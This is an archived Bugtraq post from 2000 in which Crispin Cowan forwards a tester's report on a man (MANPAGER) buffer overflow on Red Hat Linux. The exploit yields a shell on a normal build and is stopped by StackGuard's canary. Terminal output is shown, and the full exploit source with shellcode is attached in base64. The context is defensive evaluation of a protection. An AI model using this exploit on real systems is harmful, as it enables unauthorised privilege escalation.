Bugtraq mailing list archives
Re: No-Exec Stack Smashing 101
From: crispin () WIREX COM (Crispin Cowan)
Date: Thu, 20 Apr 2000 05:00:42 +0000
"Granquist, Lamont" wrote:
Okay, so I'm setting off to exploit the /usr/bin/man MANPATH exploit on RH6.1 (actually my system is RH6.2 i686 with man-1.5g-6 installed on it). And I'm looking for a little help here. What I've been playing with so far is things like the following trying to sort out the parameters of the buffer overflow. ... So, anyone got any tips for where to point the RA and what the stack
should look like?
At WireX we've been doing some fresh vulnerability testing. In the attached e-mail, M.C.Mar <woloszyn () ipartners pl> describes his work for us demonstrating an exploit against the man vulnerability, and then demonstrating that the StackGuarded version of man is not vulnerable. We are intent on undertaking a continuous evaluation process of testing every working stack smashing exploit we can find for StackGuard compatible platforms (x86/Linux, esp. Red Hat). We would appreciate any help we can get in getting live exploits to actually work. We succeeded with man, but failed with ircii. Crispin ----- Crispin Cowan, CTO, WireX Communications, Inc. http://wirex.com Free Hardened Linux Distribution: http://immunix.org JOBS! http://immunix.org/jobs.html
From - Thu Apr 20 04:46:54 2000
Return-Path: <woloszyn () ipartners pl>
Delivered-To: crispin () wirex com
Received: from mr1.ipartners.pl (mr1.ipartners.pl [157.25.5.18])
by mithra.wirex.com (Postfix) with ESMTP id 6C3C93EC14
for <crispin () wirex com>; Tue, 4 Apr 2000 11:25:20 -0700 (PDT)
Received: from zloty.it.com.pl (zloty.it.com.pl [195.94.200.4])
by mr1.ipartners.pl (8.9.3/8.9.1/MR1.0) with ESMTP id UAA83999
for <crispin () wirex com>; Tue, 4 Apr 2000 20:23:08 +0200 (CEST)
(envelope-from woloszyn () ipartners pl)
Received: from localhost (woloszyn@localhost)
by zloty.it.com.pl with ESMTP id UAA00373
for <crispin () wirex com>; Tue, 4 Apr 2000 20:23:07 +0200 (MET DST)
X-Authentication-Warning: zloty.it.com.pl: woloszyn owned process doing -bs
Date: Tue, 4 Apr 2000 20:23:07 +0200 (MET DST)
From: "M.C.Mar" <woloszyn () ipartners pl>
X-Sender: woloszyn () zloty it com pl
To: Crispin Cowan <crispin () wirex com>
Subject: Re: First Penetration Test
In-Reply-To: <38E995DB.4692065C () wirex com>
Message-ID: <Pine.GSO.4.03.10004042007130.28715-200000 () zloty it com pl>
MIME-Version: 1.0
Content-Type: MULTIPART/DIGEST; BOUNDARY=------------B3356C5E2D4CB4E848D2CED2
Content-ID: <Pine.GSO.4.03.10004042007131.28715 () zloty it com pl>
Status:
X-Mozilla-Status: 8011
X-Mozilla-Status2: 00000000
X-UIDL: 3878981500002a3a
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime () docserver cac washington edu for more info.
--------------B3356C5E2D4CB4E848D2CED2
Content-Type: TEXT/PLAIN; CHARSET=iso-8859-1
Content-Transfer-Encoding: 8BIT
Content-ID: <Pine.GSO.4.03.10004042007132.28715 () zloty it com pl>
OK. I have only two hours today so I started with man.
I compiled vulnerable man sources (man-1.5g-6.src.rpm) with regular
egcs-1.1.2-12.i386 I have installed on my RH 6.0. I Tuned the exploit to
produce shell on my system:
[emsi@pipek ~]$ ./a.out
RET: 0xbffff470 len: 4073
sh:F?F V
° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
Error executing formatting or display command.
System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F V
°
NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
?ó
bash$ id
uid=1000(emsi) gid=1000(emsi) egid=15(man) groups=1000(emsi)
bash$
I attached the exploit.
Then I recompiled the vulnerable code with
gcc-2.7.2.3-14_SGc2_SG121.i386.rpm
and tested StackGuarded code with my explot:
[emsi@pipek ~]$ ./a.out
RET: 0xbffff470 len: 4073
sh:F?F V
° NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
Error executing formatting or display command.
System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F V
°
NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
?ó
man[6129]: Immunix type 2 Canary[7] = 850e2904 died with cadaver ae4bfc74
in procedure display_cat_file.
As I mentioned at the beginig I have only two hours so I didn't examine the
vulnerable code whether it is posible to exploit the vulnerability
bypassing StacGuard protection.
--
Mariusz Wo³oszyn
Internet Security Specialist, IT -- Internet Partners
E-mail: Mariusz.Woloszyn () it pl, woloszyn () it pl
--------------B3356C5E2D4CB4E848D2CED2
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="4man.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.GSO.4.03.10004042023070.28715 () zloty it com pl>
Content-Description:
Content-Disposition: attachment; filename="4man.c"
LyoNCiAqIFJld3JpdGVuIGZyb206DQogKiAoYykgMjAwMCBiYWJjaWEgcGFk
bGluYSAvIGIwZg0KICogKGxjYW10dWYncyBpZGVhKQ0KICogYnkgS2lsM3Ig
b2YgTGFtM3JaDQogKiANCiAqIHJlZGhhdCA2LjEgL3Vzci9iaW4vbWFuIGV4
cGxvaXQNCiovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN5
cy9wYXJhbS5oPg0KI2luY2x1ZGUgPHN5cy9zdGF0Lmg+DQojaW5jbHVkZSA8
c3RyaW5nLmg+DQoNCiNkZWZpbmUgTk9QCQkweDkwDQojZGVmaW5lIE9GUwkJ
MTgwMA0KI2RlZmluZSBCVUZTSVpFCQk0MDE3DQojZGVmaW5lIEFERFJTCQkx
MDAwDQoNCmxvbmcgZ2V0ZXNwKHZvaWQpDQp7DQogICBfX2FzbV9fKCJtb3Zs
ICVlc3AsICVlYXhcbiIpOw0KfQ0KDQppbnQgbWFpbihhcmdjLCBhcmd2KQ0K
aW50IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsNCgljaGFyICpleGVjc2hlbGwg
PQ0KCSJceGViXHgxZlx4NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4ODhceDQ2
XHgwN1x4ODlceDQ2XHgwY1x4YjBceDBiIg0KCSJceDg5XHhmM1x4OGRceDRl
XHgwOFx4OGRceDU2XHgwY1x4Y2RceDgwXHgzMVx4ZGJceDg5XHhkOFx4NDBc
eGNkIg0KCSJceDgwXHhlOFx4ZGNceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0K
CWNoYXIgYnVmW0JVRlNJWkUrc3RybGVuKGV4ZWNzaGVsbCldLCAqcDsNCglp
bnQgbm9wbGVuLCBpLCBvZnM7DQoJbG9uZyByZXQsICphcDsNCg0KCXJldCA9
IGdldGVzcCgpICsgT0ZTOw0KDQoJbWVtc2V0KGJ1ZixOT1AsQlVGU0laRStz
dHJsZW4oZXhlY3NoZWxsKSk7DQoJbWVtY3B5KGJ1ZitCVUZTSVpFLShzdHJs
ZW4oZXhlY3NoZWxsKSsyMCksZXhlY3NoZWxsLHN0cmxlbihleGVjc2hlbGwp
KTsNCg0KCXA9YnVmK0JVRlNJWkUrc3RybGVuKGV4ZWNzaGVsbCktNDsNCglh
cD0oaW50ICopcDsNCgkqYXA9cmV0OyAvLzB4NDY0NjQ2NDY7DQoNCglmcHJp
bnRmKHN0ZGVyciwgIlJFVDogMHgleCAgbGVuOiAlZFxuXG4iLCByZXQsIHN0
cmxlbihidWYpKTsNCg0KCXNldGVudigiTUFOUEFHRVIiLCBidWYsIDEpOw0K
CWV4ZWNsKCIuL21hbiIsICJtYW4iLCAibHMiLCAwKTsNCg0KCXJldHVybiAw
Ow0KfQ0K
--------------B3356C5E2D4CB4E848D2CED2--
Current thread:
- Re: No-Exec Stack Smashing 101 Crispin Cowan (Apr 19)